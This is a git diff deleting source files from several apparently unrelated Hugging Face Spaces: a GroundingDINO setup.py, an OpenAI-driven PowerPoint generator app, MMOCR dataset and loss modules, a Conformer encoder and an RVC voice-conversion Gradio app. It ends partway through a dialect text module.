OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# ------------------------------------------------------------------------------------------------ -# Modified from -# https://github.com/fundamentalvision/Deformable-DETR/blob/main/models/ops/setup.py -# https://github.com/facebookresearch/detectron2/blob/main/setup.py -# https://github.com/open-mmlab/mmdetection/blob/master/setup.py -# https://github.com/Oneflow-Inc/libai/blob/main/setup.py -# ------------------------------------------------------------------------------------------------ - -import glob -import os -import subprocess - -import torch -from setuptools import find_packages, setup -from torch.utils.cpp_extension import CUDA_HOME, CppExtension, CUDAExtension - -# groundingdino version info -version = "0.1.0" -package_name = "groundingdino" -cwd = os.path.dirname(os.path.abspath(__file__)) - - -sha = "Unknown" -try: - sha = subprocess.check_output(["git", "rev-parse", "HEAD"], cwd=cwd).decode("ascii").strip() -except Exception: - pass - - -def write_version_file(): - version_path = os.path.join(cwd, "groundingdino", "version.py") - with open(version_path, "w") as f: - f.write(f"__version__ = '{version}'\n") - # f.write(f"git_version = {repr(sha)}\n") - - -requirements = ["torch", "torchvision"] - -torch_ver = [int(x) for x in torch.__version__.split(".")[:2]] - - -def get_extensions(): - this_dir = os.path.dirname(os.path.abspath(__file__)) - extensions_dir = os.path.join(this_dir, "groundingdino", "models", "GroundingDINO", "csrc") - - main_source = os.path.join(extensions_dir, "vision.cpp") - sources = glob.glob(os.path.join(extensions_dir, "**", "*.cpp")) - source_cuda = glob.glob(os.path.join(extensions_dir, "**", "*.cu")) + glob.glob( - os.path.join(extensions_dir, "*.cu") - ) - - sources = [main_source] + sources - - extension = CppExtension - - extra_compile_args = {"cxx": []} - define_macros = [] - - if torch.cuda.is_available() and CUDA_HOME is not None: - print("Compiling with CUDA") - extension = CUDAExtension - sources += source_cuda - define_macros += [("WITH_CUDA", None)] - extra_compile_args["nvcc"] = [ - "-DCUDA_HAS_FP16=1", - "-D__CUDA_NO_HALF_OPERATORS__", - "-D__CUDA_NO_HALF_CONVERSIONS__", - "-D__CUDA_NO_HALF2_OPERATORS__", - ] - else: - print("Compiling without CUDA") - define_macros += [("WITH_HIP", None)] - extra_compile_args["nvcc"] = [] - return None - - sources = [os.path.join(extensions_dir, s) for s in sources] - include_dirs = [extensions_dir] - - ext_modules = [ - extension( - "groundingdino._C", - sources, - include_dirs=include_dirs, - define_macros=define_macros, - extra_compile_args=extra_compile_args, - ) - ] - - return ext_modules - - -def parse_requirements(fname="requirements.txt", with_version=True): - """Parse the package dependencies listed in a requirements file but strips - specific versioning information. - - Args: - fname (str): path to requirements file - with_version (bool, default=False): if True include version specs - - Returns: - List[str]: list of requirements items - - CommandLine: - python -c "import setup; print(setup.parse_requirements())" - """ - import re - import sys - from os.path import exists - - require_fpath = fname - - def parse_line(line): - """Parse information from a line in a requirements text file.""" - if line.startswith("-r "): - # Allow specifying requirements in other files - target = line.split(" ")[1] - for info in parse_require_file(target): - yield info - else: - info = {"line": line} - if line.startswith("-e "): - info["package"] = line.split("#egg=")[1] - elif "@git+" in line: - info["package"] = line - else: - # Remove versioning from the package - pat = "(" + "|".join([">=", "==", ">"]) + ")" - parts = re.split(pat, line, maxsplit=1) - parts = [p.strip() for p in parts] - - info["package"] = parts[0] - if len(parts) > 1: - op, rest = parts[1:] - if ";" in rest: - # Handle platform specific dependencies - # http://setuptools.readthedocs.io/en/latest/setuptools.html#declaring-platform-specific-dependencies - version, platform_deps = map(str.strip, rest.split(";")) - info["platform_deps"] = platform_deps - else: - version = rest # NOQA - info["version"] = (op, version) - yield info - - def parse_require_file(fpath): - with open(fpath, "r") as f: - for line in f.readlines(): - line = line.strip() - if line and not line.startswith("#"): - for info in parse_line(line): - yield info - - def gen_packages_items(): - if exists(require_fpath): - for info in parse_require_file(require_fpath): - parts = [info["package"]] - if with_version and "version" in info: - parts.extend(info["version"]) - if not sys.version.startswith("3.4"): - # apparently package_deps are broken in 3.4 - platform_deps = info.get("platform_deps") - if platform_deps is not None: - parts.append(";" + platform_deps) - item = "".join(parts) - yield item - - packages = list(gen_packages_items()) - return packages - - -if __name__ == "__main__": - print(f"Building wheel {package_name}-{version}") - - with open("LICENSE", "r", encoding="utf-8") as f: - license = f.read() - - write_version_file() - - setup( - name="groundingdino", - version="0.1.0", - author="International Digital Economy Academy, Shilong Liu", - url="https://github.com/IDEA-Research/GroundingDINO", - description="open-set object detector", - license=license, - install_requires=parse_requirements("requirements.txt"), - packages=find_packages( - exclude=( - "configs", - "tests", - ) - ), - ext_modules=get_extensions(), - cmdclass={"build_ext": torch.utils.cpp_extension.BuildExtension}, - ) diff --git a/spaces/MinzChan/ChatGPT-PPT-Generate-With-Azure-OpenAI-API/app.py b/spaces/MinzChan/ChatGPT-PPT-Generate-With-Azure-OpenAI-API/app.py deleted file mode 100644 index 59bc948451d17de6add72192b9e36c6f18df4d44..0000000000000000000000000000000000000000 --- a/spaces/MinzChan/ChatGPT-PPT-Generate-With-Azure-OpenAI-API/app.py +++ /dev/null @@ -1,259 +0,0 @@ -import glob -import os -import random -import re -import string - -import gradio as gr - -import openai -from icrawler import ImageDownloader -from icrawler.builtin import GoogleImageCrawler, BingImageCrawler -from uuid import uuid4 -from pptx import Presentation - -bad_coding_practice = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in - range(16)) - - -def refresh_bad_coding_practice(): - global bad_coding_practice - bad_coding_practice = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) - for _ in range(16)) - return - - -class PrefixNameDownloader(ImageDownloader): - - def get_filename(self, task, default_ext): - filename = super(PrefixNameDownloader, self).get_filename( - task, default_ext) - print(bad_coding_practice) - return 'prefix_' + bad_coding_practice + filename - - -def generate_ppt(file, topic, slide_length, api_type, api_base, api_version, api_key): - print(file.name) - - root = Presentation(file.name) - - openai.api_type = api_type - openai.api_base = api_base - openai.api_version = api_version - openai.api_key = api_key - - message = f""" - Create content for a slideshow presentation. - The content's topic is {topic}. - The slideshow is {slide_length} slides long. - The content is written in the language of the content I give you above. - - - You are allowed to use the following slide types: - - Slide types: - Title Slide - (Title, Subtitle) - Content Slide - (Title, Content) - Image Slide - (Title, Content, Image) - Thanks Slide - (Title) - - Put this tag before the Title Slide: [L_TS] - Put this tag before the Content Slide: [L_CS] - Put this tag before the Image Slide: [L_IS] - Put this tag before the Thanks Slide: [L_THS] - - Put "[SLIDEBREAK]" after each slide - - For example: - [L_TS] - [TITLE]Mental Health[/TITLE] - - [SLIDEBREAK] - - [L_CS] - [TITLE]Mental Health Definition[/TITLE] - [CONTENT] - 1. Definition: A person’s condition with regard to their psychological and emotional well-being - 2. Can impact one's physical health - 3. Stigmatized too often. - [/CONTENT] - - [SLIDEBREAK] - - Put this tag before the Title: [TITLE] - Put this tag after the Title: [/TITLE] - Put this tag before the Subitle: [SUBTITLE] - Put this tag after the Subtitle: [/SUBTITLE] - Put this tag before the Content: [CONTENT] - Put this tag after the Content: [/CONTENT] - Put this tag before the Image: [IMAGE] - Put this tag after the Image: [/IMAGE] - - Elaborate on the Content, provide as much information as possible. - You put a [/CONTENT] at the end of the Content. - Do not reply as if you are talking about the slideshow itself. (ex. "Include pictures here about...") - Do not include any special characters (?, !, ., :, ) in the Title. - Do not include any additional information in your response and stick to the format.""" - - if api_type in ("azure", "azure_ad", "azuread"): - response = openai.ChatCompletion.create( - engine="GPT-35-Turbo", - messages=[ - {"role": "user", "content": message} - ] - ) - else: - response = openai.ChatCompletion.create( - model="gpt-3.5-turbo", - messages=[ - {"role": "user", "content": message} - ] - ) - - # """ Ref for slide types: - # 0 -> title and subtitle - # 1 -> title and content - # 2 -> section header - # 3 -> two content - # 4 -> Comparison - # 5 -> Title only - # 6 -> Blank - # 7 -> Content with caption - # 8 -> Pic with caption - # """ - - def delete_all_slides(): - for i in range(len(root.slides) - 1, -1, -1): - r_id = root.slides._sldIdLst[i].rId - root.part.drop_rel(r_id) - del root.slides._sldIdLst[i] - - def create_title_slide(title, subtitle): - layout = root.slide_layouts[0] - slide = root.slides.add_slide(layout) - slide.shapes.title.text = title - slide.placeholders[1].text = subtitle - - def create_section_header_slide(title): - layout = root.slide_layouts[2] - slide = root.slides.add_slide(layout) - slide.shapes.title.text = title - - def create_title_and_content_slide(title, content): - layout = root.slide_layouts[1] - slide = root.slides.add_slide(layout) - slide.shapes.title.text = title - slide.placeholders[1].text = content - - def create_title_and_content_and_image_slide(title, content, image_query): - layout = root.slide_layouts[8] - slide = root.slides.add_slide(layout) - slide.shapes.title.text = title - slide.placeholders[2].text = content - refresh_bad_coding_practice() - bing_crawler = GoogleImageCrawler(downloader_cls=PrefixNameDownloader, storage={'root_dir': os.getcwd()}) - bing_crawler.crawl(keyword=image_query, max_num=1) - dir_path = os.path.dirname(os.path.realpath(__file__)) - file_name = glob.glob(f"prefix_{bad_coding_practice}*") - print(file_name) - img_path = os.path.join(dir_path, file_name[0]) - slide.shapes.add_picture(img_path, slide.placeholders[1].left, slide.placeholders[1].top, - slide.placeholders[1].width, slide.placeholders[1].height) - - def find_text_in_between_tags(text, start_tag, end_tag): - start_pos = text.find(start_tag) - end_pos = text.find(end_tag) - result = [] - while start_pos > -1 and end_pos > -1: - text_between_tags = text[start_pos + len(start_tag):end_pos] - result.append(text_between_tags) - start_pos = text.find(start_tag, end_pos + len(end_tag)) - end_pos = text.find(end_tag, start_pos) - res1 = "".join(result) - res2 = re.sub(r"\[IMAGE\].*?\[/IMAGE\]", '', res1) - if len(result) > 0: - return res2 - else: - return "" - - def search_for_slide_type(text): - tags = ["[L_TS]", "[L_CS]", "[L_IS]", "[L_THS]"] - found_text = next((s for s in tags if s in text), None) - return found_text - - def parse_response(reply): - list_of_slides = reply.split("[SLIDEBREAK]") - for slide in list_of_slides: - slide_type = search_for_slide_type(slide) - if slide_type == "[L_TS]": - create_title_slide(find_text_in_between_tags(str(slide), "[TITLE]", "[/TITLE]"), - find_text_in_between_tags(str(slide), "[SUBTITLE]", "[/SUBTITLE]")) - elif slide_type == "[L_CS]": - create_title_and_content_slide("".join(find_text_in_between_tags(str(slide), "[TITLE]", "[/TITLE]")), - "".join(find_text_in_between_tags(str(slide), "[CONTENT]", - "[/CONTENT]"))) - elif slide_type == "[L_IS]": - create_title_and_content_and_image_slide("".join(find_text_in_between_tags(str(slide), "[TITLE]", - "[/TITLE]")), - "".join(find_text_in_between_tags(str(slide), "[CONTENT]", - "[/CONTENT]")), - "".join(find_text_in_between_tags(str(slide), "[IMAGE]", - "[/IMAGE]"))) - elif slide_type == "[L_THS]": - create_section_header_slide("".join(find_text_in_between_tags(str(slide), "[TITLE]", "[/TITLE]"))) - - def find_title(): - return root.slides[0].shapes.title.text - - delete_all_slides() - - print(response) - - parse_response(response['choices'][0]['message']['content']) - - name_ = str(uuid4()).replace('-', '') - - root.save(f"./{name_}.pptx") - - print("done") - - dir_path = "./" - prefix = "prefix_" - - for file_name in os.listdir(dir_path): - if file_name.startswith(prefix): - file_path = os.path.join(dir_path, file_name) - if os.path.isfile(file_path): - os.remove(file_path) - - return f"./{name_}.pptx" - - -with gr.Blocks(title="ChatGPT PPT框架生成") as demo: - gr.Markdown("""

    ChatGPT PPT框架生成

    """) - with gr.Row(): - with gr.Column(): - openai_type = gr.Textbox(label="OpenAI API Type", placeholder="azure,azure_ad and azuread for Azure OpenAI, open_ai for OpenAI official", value="azure") - openai_base = gr.Textbox(label="OpenAI API Base", placeholder="https://xxx.openai.azure.com/ for Azure OpenAI, https://api.openai.com/v1 for OpenAI official", value="https://xxx.openai.azure.com/") - openai_version = gr.Textbox(label="OpenAI API Version", value="2023-03-15-preview") - openai_token = gr.Textbox(label="OpenAI API Key", placeholder="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx for Azure OpenAI, sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx for OpenAI official",) - topic = gr.Textbox(label="PPT的主题或内容") - length = gr.Slider(minimum=1, maximum=50, value=6, label="生成的PPT页数", step=1) - theme = gr.File(value="./theme.pptx", file_types=['pptx', 'ppt'], label="PPT模版") - output_file = gr.File(interactive=False) - - topic.submit( - fn=generate_ppt, - inputs=[theme, topic, length, openai_type, openai_base, openai_version, openai_token], - outputs=[output_file] - ) - - submit = gr.Button("生成") - submit.click( - fn=generate_ppt, - inputs=[theme, topic, length, openai_type, openai_base, openai_version, openai_token], - outputs=[output_file] - ) - -if __name__ == "__main__": - demo.launch() diff --git a/spaces/Mountchicken/MAERec-Gradio/mmocr/datasets/recog_text_dataset.py b/spaces/Mountchicken/MAERec-Gradio/mmocr/datasets/recog_text_dataset.py deleted file mode 100644 index 25cc54ff8e3639fc5a3ba3182749d0920bfc0a8b..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/mmocr/datasets/recog_text_dataset.py +++ /dev/null @@ -1,134 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import os.path as osp -from typing import Callable, List, Optional, Sequence, Union - -from mmengine.dataset import BaseDataset -from mmengine.fileio import list_from_file - -from mmocr.registry import DATASETS, TASK_UTILS - - -@DATASETS.register_module() -class RecogTextDataset(BaseDataset): - r"""RecogTextDataset for text recognition. - - The annotation format can be both in jsonl and txt. If the annotation file - is in jsonl format, it should be a list of dicts. If the annotation file - is in txt format, it should be a list of lines. - - The annotation formats are shown as follows. - - txt format - .. code-block:: none - - ``test_img1.jpg OpenMMLab`` - ``test_img2.jpg MMOCR`` - - - jsonl format - .. code-block:: none - - ``{"filename": "test_img1.jpg", "text": "OpenMMLab"}`` - ``{"filename": "test_img2.jpg", "text": "MMOCR"}`` - - Args: - ann_file (str): Annotation file path. Defaults to ''. - backend_args (dict, optional): Arguments to instantiate the - prefix of uri corresponding backend. Defaults to None. - parse_cfg (dict, optional): Config of parser for parsing annotations. - Use ``LineJsonParser`` when the annotation file is in jsonl format - with keys of ``filename`` and ``text``. The keys in parse_cfg - should be consistent with the keys in jsonl annotations. The first - key in parse_cfg should be the key of the path in jsonl - annotations. The second key in parse_cfg should be the key of the - text in jsonl Use ``LineStrParser`` when the annotation file is in - txt format. Defaults to - ``dict(type='LineJsonParser', keys=['filename', 'text'])``. - metainfo (dict, optional): Meta information for dataset, such as class - information. Defaults to None. - data_root (str): The root directory for ``data_prefix`` and - ``ann_file``. Defaults to ''. - data_prefix (dict): Prefix for training data. Defaults to - ``dict(img_path='')``. - filter_cfg (dict, optional): Config for filter data. Defaults to None. - indices (int or Sequence[int], optional): Support using first few - data in annotation file to facilitate training/testing on a smaller - dataset. Defaults to None which means using all ``data_infos``. - serialize_data (bool, optional): Whether to hold memory using - serialized objects, when enabled, data loader workers can use - shared RAM from master process instead of making a copy. Defaults - to True. - pipeline (list, optional): Processing pipeline. Defaults to []. - test_mode (bool, optional): ``test_mode=True`` means in test phase. - Defaults to False. - lazy_init (bool, optional): Whether to load annotation during - instantiation. In some cases, such as visualization, only the meta - information of the dataset is needed, which is not necessary to - load annotation file. ``RecogTextDataset`` can skip load - annotations to save time by set ``lazy_init=False``. Defaults to - False. - max_refetch (int, optional): If ``RecogTextDataset.prepare_data`` get a - None img. The maximum extra number of cycles to get a valid - image. Defaults to 1000. - """ - - def __init__(self, - ann_file: str = '', - backend_args=None, - parser_cfg: Optional[dict] = dict( - type='LineJsonParser', keys=['filename', 'text']), - metainfo: Optional[dict] = None, - data_root: Optional[str] = '', - data_prefix: dict = dict(img_path=''), - filter_cfg: Optional[dict] = None, - indices: Optional[Union[int, Sequence[int]]] = None, - serialize_data: bool = True, - pipeline: List[Union[dict, Callable]] = [], - test_mode: bool = False, - lazy_init: bool = False, - max_refetch: int = 1000) -> None: - - self.parser = TASK_UTILS.build(parser_cfg) - self.backend_args = backend_args - super().__init__( - ann_file=ann_file, - metainfo=metainfo, - data_root=data_root, - data_prefix=data_prefix, - filter_cfg=filter_cfg, - indices=indices, - serialize_data=serialize_data, - pipeline=pipeline, - test_mode=test_mode, - lazy_init=lazy_init, - max_refetch=max_refetch) - - def load_data_list(self) -> List[dict]: - """Load annotations from an annotation file named as ``self.ann_file`` - - Returns: - List[dict]: A list of annotation. - """ - data_list = [] - raw_anno_infos = list_from_file( - self.ann_file, backend_args=self.backend_args) - for raw_anno_info in raw_anno_infos: - data_list.append(self.parse_data_info(raw_anno_info)) - return data_list - - def parse_data_info(self, raw_anno_info: str) -> dict: - """Parse raw annotation to target format. - - Args: - raw_anno_info (str): One raw data information loaded - from ``ann_file``. - - Returns: - (dict): Parsed annotation. - """ - data_info = {} - parsed_anno = self.parser(raw_anno_info) - img_path = osp.join(self.data_prefix['img_path'], - parsed_anno[self.parser.keys[0]]) - - data_info['img_path'] = img_path - data_info['instances'] = [dict(text=parsed_anno[self.parser.keys[1]])] - return data_info diff --git a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/module_losses/seg_based_module_loss.py b/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/module_losses/seg_based_module_loss.py deleted file mode 100644 index 2f2166921a1a31e9cbe1bfb0be7b8a9d2252b3d4..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/module_losses/seg_based_module_loss.py +++ /dev/null @@ -1,100 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import sys -from typing import Optional, Sequence, Tuple, Union - -import cv2 -import numpy as np -import torch -from mmengine.logging import MMLogger -from shapely.geometry import Polygon - -from mmocr.utils.polygon_utils import offset_polygon -from .base import BaseTextDetModuleLoss - - -class SegBasedModuleLoss(BaseTextDetModuleLoss): - """Base class for the module loss of segmentation-based text detection - algorithms with some handy utilities.""" - - def _generate_kernels( - self, - img_size: Tuple[int, int], - text_polys: Sequence[np.ndarray], - shrink_ratio: float, - max_shrink_dist: Union[float, int] = sys.maxsize, - ignore_flags: Optional[torch.Tensor] = None - ) -> Tuple[np.ndarray, np.ndarray]: - """Generate text instance kernels according to a shrink ratio. - - Args: - img_size (tuple(int, int)): The image size of (height, width). - text_polys (Sequence[np.ndarray]): 2D array of text polygons. - shrink_ratio (float or int): The shrink ratio of kernel. - max_shrink_dist (float or int): The maximum shrinking distance. - ignore_flags (torch.BoolTensor, optional): Indicate whether the - corresponding text polygon is ignored. Defaults to None. - - Returns: - tuple(ndarray, ndarray): The text instance kernels of shape - (height, width) and updated ignorance flags. - """ - assert isinstance(img_size, tuple) - assert isinstance(shrink_ratio, (float, int)) - - logger: MMLogger = MMLogger.get_current_instance() - - h, w = img_size - text_kernel = np.zeros((h, w), dtype=np.float32) - - for text_ind, poly in enumerate(text_polys): - if ignore_flags is not None and ignore_flags[text_ind]: - continue - poly = poly.reshape(-1, 2).astype(np.int32) - poly_obj = Polygon(poly) - area = poly_obj.area - peri = poly_obj.length - distance = min( - int(area * (1 - shrink_ratio * shrink_ratio) / (peri + 0.001) + - 0.5), max_shrink_dist) - shrunk_poly = offset_polygon(poly, -distance) - - if len(shrunk_poly) == 0: - if ignore_flags is not None: - ignore_flags[text_ind] = True - continue - - try: - shrunk_poly = shrunk_poly.reshape(-1, 2) - except Exception as e: - logger.info(f'{shrunk_poly} with error {e}') - if ignore_flags is not None: - ignore_flags[text_ind] = True - continue - - cv2.fillPoly(text_kernel, [shrunk_poly.astype(np.int32)], - text_ind + 1) - - return text_kernel, ignore_flags - - def _generate_effective_mask(self, mask_size: Tuple[int, int], - ignored_polygons: Sequence[np.ndarray] - ) -> np.ndarray: - """Generate effective mask by setting the invalid regions to 0 and 1 - otherwise. - - Args: - mask_size (tuple(int, int)): The mask size. - ignored_polygons (Sequence[ndarray]): 2-d array, representing all - the ignored polygons of the text region. - - Returns: - mask (ndarray): The effective mask of shape (height, width). - """ - - mask = np.ones(mask_size, dtype=np.uint8) - - for poly in ignored_polygons: - instance = poly.astype(np.int32).reshape(1, -1, 2) - cv2.fillPoly(mask, instance, 0) - - return mask diff --git a/spaces/NATSpeech/PortaSpeech/modules/commons/conformer/conformer.py b/spaces/NATSpeech/PortaSpeech/modules/commons/conformer/conformer.py deleted file mode 100644 index 21e1ecdda7ec069864d3904abb4360ec5aee637e..0000000000000000000000000000000000000000 --- a/spaces/NATSpeech/PortaSpeech/modules/commons/conformer/conformer.py +++ /dev/null @@ -1,72 +0,0 @@ -from torch import nn -from .espnet_positional_embedding import RelPositionalEncoding -from .espnet_transformer_attn import RelPositionMultiHeadedAttention -from .layers import Swish, ConvolutionModule, EncoderLayer, MultiLayeredConv1d -from ..layers import Embedding - - -class ConformerLayers(nn.Module): - def __init__(self, hidden_size, num_layers, kernel_size=9, dropout=0.0, num_heads=4, - use_last_norm=True, save_hidden=False): - super().__init__() - self.use_last_norm = use_last_norm - self.layers = nn.ModuleList() - positionwise_layer = MultiLayeredConv1d - positionwise_layer_args = (hidden_size, hidden_size * 4, 1, dropout) - self.pos_embed = RelPositionalEncoding(hidden_size, dropout) - self.encoder_layers = nn.ModuleList([EncoderLayer( - hidden_size, - RelPositionMultiHeadedAttention(num_heads, hidden_size, 0.0), - positionwise_layer(*positionwise_layer_args), - positionwise_layer(*positionwise_layer_args), - ConvolutionModule(hidden_size, kernel_size, Swish()), - dropout, - ) for _ in range(num_layers)]) - if self.use_last_norm: - self.layer_norm = nn.LayerNorm(hidden_size) - else: - self.layer_norm = nn.Linear(hidden_size, hidden_size) - self.save_hidden = save_hidden - if save_hidden: - self.hiddens = [] - - def forward(self, x, padding_mask=None): - """ - - :param x: [B, T, H] - :param padding_mask: [B, T] - :return: [B, T, H] - """ - self.hiddens = [] - nonpadding_mask = x.abs().sum(-1) > 0 - x = self.pos_embed(x) - for l in self.encoder_layers: - x, mask = l(x, nonpadding_mask[:, None, :]) - if self.save_hidden: - self.hiddens.append(x[0]) - x = x[0] - x = self.layer_norm(x) * nonpadding_mask.float()[:, :, None] - return x - - -class ConformerEncoder(ConformerLayers): - def __init__(self, hidden_size, dict_size, num_layers=None): - conformer_enc_kernel_size = 9 - super().__init__(hidden_size, num_layers, conformer_enc_kernel_size) - self.embed = Embedding(dict_size, hidden_size, padding_idx=0) - - def forward(self, x): - """ - - :param src_tokens: [B, T] - :return: [B x T x C] - """ - x = self.embed(x) # [B, T, H] - x = super(ConformerEncoder, self).forward(x) - return x - - -class ConformerDecoder(ConformerLayers): - def __init__(self, hidden_size, num_layers): - conformer_dec_kernel_size = 9 - super().__init__(hidden_size, num_layers, conformer_dec_kernel_size) diff --git a/spaces/Naszirs397/rvc-models/app.py b/spaces/Naszirs397/rvc-models/app.py deleted file mode 100644 index 5ef3bed52089af1afd7b5edcf72721d92b2bbbe0..0000000000000000000000000000000000000000 --- a/spaces/Naszirs397/rvc-models/app.py +++ /dev/null @@ -1,188 +0,0 @@ -import os -import json -import argparse -import traceback -import logging -import gradio as gr -import numpy as np -import librosa -import torch -import asyncio -import edge_tts -from datetime import datetime -from fairseq import checkpoint_utils -from infer_pack.models import SynthesizerTrnMs256NSFsid, SynthesizerTrnMs256NSFsid_nono -from vc_infer_pipeline import VC -from config import ( - is_half, - device -) -logging.getLogger("numba").setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" # limit audio length in huggingface spaces - -def create_vc_fn(tgt_sr, net_g, vc, if_f0, file_index, file_big_npy): - def vc_fn( - input_audio, - f0_up_key, - f0_method, - index_rate, - tts_mode, - tts_text, - tts_voice - ): - try: - if tts_mode: - if len(tts_text) > 100 and limitation: - return "Text is too long", None - if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - else: - if args.files: - audio, sr = librosa.load(input_audio, sr=16000, mono=True) - else: - if input_audio is None: - return "You need to upload an audio", None - sampling_rate, audio = input_audio - duration = audio.shape[0] / sampling_rate - if duration > 20 and limitation: - return "Please upload an audio file that is less than 20 seconds. If you need to generate a longer audio file, please use Colab.", None - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - times = [0, 0, 0] - f0_up_key = int(f0_up_key) - audio_opt = vc.pipeline( - hubert_model, - net_g, - 0, - audio, - times, - f0_up_key, - f0_method, - file_index, - file_big_npy, - index_rate, - if_f0, - ) - print( - f"[{datetime.now().strftime('%Y-%m-%d %H:%M')}]: npy: {times[0]}, f0: {times[1]}s, infer: {times[2]}s" - ) - return "Success", (tgt_sr, audio_opt) - except: - info = traceback.format_exc() - print(info) - return info, (None, None) - return vc_fn - -def load_hubert(): - global hubert_model - models, _, _ = checkpoint_utils.load_model_ensemble_and_task( - ["hubert_base.pt"], - suffix="", - ) - hubert_model = models[0] - hubert_model = hubert_model.to(device) - if is_half: - hubert_model = hubert_model.half() - else: - hubert_model = hubert_model.float() - hubert_model.eval() - -def change_to_tts_mode(tts_mode): - if tts_mode: - return gr.Audio.update(visible=False), gr.Textbox.update(visible=True), gr.Dropdown.update(visible=True) - else: - return gr.Audio.update(visible=True), gr.Textbox.update(visible=False), gr.Dropdown.update(visible=False) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - parser.add_argument("--files", action="store_true", default=False, help="load audio from path") - args, unknown = parser.parse_known_args() - load_hubert() - models = [] - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - voices = [f"{v['ShortName']}-{v['Gender']}" for v in tts_voice_list] - with open("weights/model_info.json", "r", encoding="utf-8") as f: - models_info = json.load(f) - for name, info in models_info.items(): - if not info['enable']: - continue - title = info['title'] - author = info.get("author", None) - cover = f"weights/{name}/{info['cover']}" - index = f"weights/{name}/{info['feature_retrieval_library']}" - npy = f"weights/{name}/{info['feature_file']}" - cpt = torch.load(f"weights/{name}/{name}.pth", map_location="cpu") - tgt_sr = cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - if_f0 = cpt.get("f0", 1) - if if_f0 == 1: - net_g = SynthesizerTrnMs256NSFsid(*cpt["config"], is_half=is_half) - else: - net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - del net_g.enc_q - print(net_g.load_state_dict(cpt["weight"], strict=False)) # 不加这一行清不干净, 真奇葩 - net_g.eval().to(device) - if is_half: - net_g = net_g.half() - else: - net_g = net_g.float() - vc = VC(tgt_sr, device, is_half) - models.append((name, title, author, cover, create_vc_fn(tgt_sr, net_g, vc, if_f0, index, npy))) - with gr.Blocks() as app: - gr.Markdown( - "#
    RVC Models\n" - "##
    The input audio should be clean and pure voice without background music.\n" - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=zomehwh.Rvc-Models)\n\n" - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/16MXRcKEjGDqQzVanvi8xYOOOlhdNBopM?usp=share_link)\n\n" - "[![Duplicate this Space](https://huggingface.co/datasets/huggingface/badges/raw/main/duplicate-this-space-sm-dark.svg)](https://huggingface.co/spaces/zomehwh/rvc-models?duplicate=true)\n\n" - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI)" - - ) - with gr.Tabs(): - for (name, title, author, cover, vc_fn) in models: - with gr.TabItem(name): - with gr.Row(): - gr.Markdown( - '
    ' - f'
    {title}
    \n'+ - (f'
    Model author: {author}
    ' if author else "")+ - (f'' if cover else "")+ - '
    ' - ) - with gr.Row(): - with gr.Column(): - if args.files: - vc_input = gr.Textbox(label="Input audio path") - else: - vc_input = gr.Audio(label="Input audio"+' (less than 20 seconds)' if limitation else '') - vc_transpose = gr.Number(label="Transpose", value=0) - vc_f0method = gr.Radio( - label="Pitch extraction algorithm, PM is fast but Harvest is better for low frequencies", - choices=["pm", "harvest"], - value="pm", - interactive=True, - ) - vc_index_ratio = gr.Slider( - minimum=0, - maximum=1, - label="Retrieval feature ratio", - value=0.6, - interactive=True, - ) - tts_mode = gr.Checkbox(label="tts (use edge-tts as input)", value=False) - tts_text = gr.Textbox(visible=False,label="TTS text (100 words limitation)" if limitation else "TTS text") - tts_voice = gr.Dropdown(label="Edge-tts speaker", choices=voices, visible=False, allow_custom_value=False, value="en-US-AnaNeural-Female") - vc_submit = gr.Button("Generate", variant="primary") - with gr.Column(): - vc_output1 = gr.Textbox(label="Output Message") - vc_output2 = gr.Audio(label="Output Audio") - vc_submit.click(vc_fn, [vc_input, vc_transpose, vc_f0method, vc_index_ratio, tts_mode, tts_text, tts_voice], [vc_output1, vc_output2]) - tts_mode.change(change_to_tts_mode, [tts_mode], [vc_input, tts_text, tts_voice]) - app.queue(concurrency_count=1, max_size=20, api_open=args.api).launch(share=args.share) \ No newline at end of file diff --git a/spaces/NiuTaipu/moe-tts-test01/text/ngu_dialect.py b/spaces/NiuTaipu/moe-tts-test01/text/ngu_dialect.py deleted file mode 100644 index 69d0ce6fe5a989843ee059a71ccab793f20f9176..0000000000000000000000000000000000000000 --- a/spaces/NiuTaipu/moe-tts-test01/text/ngu_dialect.py +++ /dev/null @@ -1,30 +0,0 @@ -import re -import opencc - - -dialects = {'SZ': 'suzhou', 'WX': 'wuxi', 'CZ': 'changzhou', 'HZ': 'hangzhou', - 'SX': 'shaoxing', 'NB': 'ningbo', 'JJ': 'jingjiang', 'YX': 'yixing', - 'JD': 'jiading', 'ZR': 'zhenru', 'PH': 'pinghu', 'TX': 'tongxiang', - 'JS': 'jiashan', 'HN': 'xiashi', 'LP': 'linping', 'XS': 'xiaoshan', - 'FY': 'fuyang', 'RA': 'ruao', 'CX': 'cixi', 'SM': 